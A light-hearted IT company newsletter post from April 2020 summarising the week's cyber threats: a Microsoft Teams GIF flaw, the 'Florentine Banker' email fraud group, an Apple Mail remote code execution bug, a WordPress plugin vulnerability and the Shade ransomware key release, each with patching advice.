<img height="1" width="1" style="display:none;" alt="" src="https://dc.ads.linkedin.com/collect/?pid=156961&amp;fmt=gif">
Mirus IT Threat Thursday 30th April 2020

#ThreatThursday | 30th April 2020 | Cyber Security Updates

We’re back with your regular rundown of the week’s biggest cyber threats and vulnerabilities.

This week...

The Gif of the Gab: How Animated Gifs Could Compromise Your Teams Network

For those of us who can’t respond to Teams messages without slipping in their own contextual gifs, this latest vulnerability discovered by CyberArk might force you to reconsider – or better yet, download the latest fix from Microsoft.

CyberArk discovered how, thanks to a vulnerability in Microsoft’s “Web Token” authentication system, an attacker could compromise a victim’s systems and essentially act as the user using nothing more than a simple gif. CyberArk’s write-up explains the process far better than I could hope to, but a simplified explanation is that sending a malicious gif might have given hackers access to an organisation’s entire network of Teams users; all it took was for one hapless victim to receive the gif file in question.

So far, it appears that the exploit has not been used in the wild, and was patched by Microsoft following a discreet tip-off from CyberArk – but now the vulnerability is known, it’s only a matter of time before threat actors start targeting those who haven’t downloaded the latest Teams updates. You should probably go right ahead and do that.

On the subject of gifs, I challenge anyone to find one better than this one of Her Majesty the Queen being delighted by a herd of cows.

The Florentine Banker is Neither from Florentine, Nor a Banker

British Equity firms are being targeted by a group of cyber criminals dubbed “The Florentine Banker”, whose business email compromise attacks have earned them a cool $700,000; a significant portion of the collective $1.3million they tricked three organisations into wire transferring. Check Point Research shared their findings on the malicious group in a report published last week.

The hacker collective has seen great success in the past, nabbing $1million dollars from a Chinese venture capital firm using elaborate spear phishing techniques. Targeting multiple key employees from their target company, the hackers seek to gain control over the user’s email account by hijacking login data via phony phishing websites. Logging into the victim’s email account, they then start to learn more about the target and their connections, creating mailbox rules from within the victim’s inbox and carefully curating important emails into their own folder for later perusal. This intel-gathering approach helps the hackers create more personalised, convincing methods for further attacks.

From here, the hackers can intercept legitimate wire transfer requests and make seemingly legitimate requests that the transfer be redirected – into their own account, naturally.

It’s a smart spin on the otherwise crude methods of spear phishing but thankfully, these methods can all be circumvented - you just need to know what to look for. The phony websites the gang are using, for example, often contain minor misspellings from their more legitimate counterparts. Remember to always check your site is secure – and if not, it shouldn’t be too hard to find its legitimate, secure version for comparison.

Old Hack Emails Causing Harm, E-I-E-I-Phone

I cannot apologise enough for that headline.

Since as far back as iOS 6 - released in that comparatively golden era of 2012 - Apple devices have been vulnerable to a Remote Code Execution attack from within the Apple Mail client. Worse still, the exploit was already being executed in the wild since January 2018, possibly before.

The vulnerability was revealed this week by ZecOps, whose research also uncovered a list of 6 possible victims; all high profile targets from across Europe, American and the rest of the world. Given the nature of the exploit’s targets, ZecOps isn’t ruling out nation state interference. The plot, she thickens.

As well as Remote Code Execution vulnerabilities, ZecOps noted that emails the victims should have received were not-quite-mysteriously missing from the victim’s inbox, suggesting a close eye is being kept on the inboxes by the threat actors, who are deleting anything that could compromise their efforts.

While it seems only high-profile individuals are being targeted, every iPhone is vulnerable until the release of iOS 13.4.5, of which a beta version has been made available. Until then, it may be wise to disable Apple Mail and refrain from talking to any diplomats, oligarchs or powerful industrialists.

For more on this vulnerability, ZecOps’ own write up is rather excellent, providing both simplified and technical explanations.

Wonky Plugin Sparks Another WordPress Bug Hunt

WordPress plugins aren’t exactly rare, and with so many independent developers providing their own, vulnerabilities certainly aren’t in short supply. This latest, discovered by the team behind the WordFence security plugin, could affect as many as 100,000 WordPress-powered sites using the Real-Time Find and Replace plugin. Using a vulnerability in the plugin, threat actors could taint the affected sites with malicious code once they’d coerced the site owner into clicking a malicious link.  

The code’s a nasty one as well, allowing the infiltrator to grant themselves admin account privileges, steal cookies or infect further visitors with drive-by malware. WordFence once again dives into the nerdy, technical stuff over on their blog page, here.

The recently released update, version 4.0.2, patches this vulnerability and was made available on Monday; if you’re one of the affected sites, now would be the time to apply the update.  

Throwing Shade? Not Anymore, as Cyber Criminals Unexpectedly Turn Over a New Leaf

The developers behind the Shade malware have, in an act of suspicious charity, apologised for creating their malicious trojan, claim to have ceased all activities since November 2019 and released 750,000 decryptor keys to help victims recover from the ransomware’s effects. Hmmm…

In a post on Github, presumably delivered with its eyes to the floor and its toes shyly circling the ground, the team stated:

 “We are the team which created a trojan-encryptor mostly known as Shade, Troldesh or Encoder.858. In fact, we stopped its distribution in the end of 2019.” the operators purportedly posted. “All other data related to our activity (including the source codes of the trojan) was irrevocably destroyed. We apologize to all the victims of the trojan and hope that the keys we published will help them to recover their data.”

You can read the full apology and removal instructions here. You might even flirt with the idea of clicking the links, which this suspicious mind has no intention of trying. Where we do agree with our turncoat trojaneers, however, is with the following:

“If you have any difficulties we advice (sic) you to wait until the antivirus companies release more convenient utilities for the decryption. Or you can ask for the free help on one of the thematic forums.”

While one wouldn’t count on a random forum-dweller for advice, waiting for the antivirus companies to curate their own remedies based on the provided files is by no means a bad idea. Yet however virtuous this act, one can’t help but treat it with the utmost caution. As SCMagazine points out, the GandCrab group ‘retired’ in June, presumably got bored, and returned to ruin Travelex for everybody with that whole Sodinokibi business.

And Finally….

Owing to my deteriorating mental state during this period of forced isolation, we continue to judge the week’s threats based on how imaginative their names are: 

The Florentine Banker

Conjuring images of a moustache-twirling, cape-swishing Dickensian villain, one can’t imagine any baddie called ‘The Florentine Banker’ without picturing he and his band of street urchins making a hasty escape down a dark, cobbled alley, cackling into the 19th century night. “You’ll never catch me!”, his voice echoes from the smog-laden distance. “I’m the Florentine Banker!”. Glorious. 9/10


With a single change of vowel, Shade could have been known as ‘Shady’ and had a moniker more suited to its cruel intentions. And while I daren’t imply that this has ruined the developers’ reputation, the fact that they’ve since retreated with their tails between their legs is a correlation that can’t be overlooked. 3/10

Aaaaaaaand we’re done.

As always, we’ll return on a Thursday near you, with more of the week’s cyber security news.


Threat Thursdays in your inbox

Why not get your weekly dose of Threat Thursday sent directly to your inbox?

Simply add your email to the subscribe box on the right ➡️, and we’ll make sure you’re updated with our regular newsletter.


Would you like to comment, or leave your thoughts?

Recent Posts